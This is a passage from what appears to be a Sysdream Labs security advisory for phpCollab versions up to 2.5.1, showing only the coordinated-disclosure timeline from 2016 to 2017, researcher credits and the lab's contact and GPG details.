* Version <= 2.5.1
## Timeline (dd/mm/yyyy)
* 27/08/2016 : Initial discovery.
* 05/10/2016 : Initial contact.
* 11/10/2016 : GPG Key exchange.
* 19/10/2016 : Advisory sent to vendor.
* 13/02/2017 : First fixes.
* 15/02/2017 : Fixes validation by Sysdream.
* 21/02/2017 : PhpCollab ask to wait before publish.
* 21/06/2017 : New version has been released.
* 29/09/2017 : Public disclosure.
## Credits
* Nicolas SERRA, Sysdream (n.serra -at- sysdream -dot- com)
--
SYSDREAM Labs <labs@sysdream.com>
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
* Website: https://sysdream.com/
* Twitter: @sysdream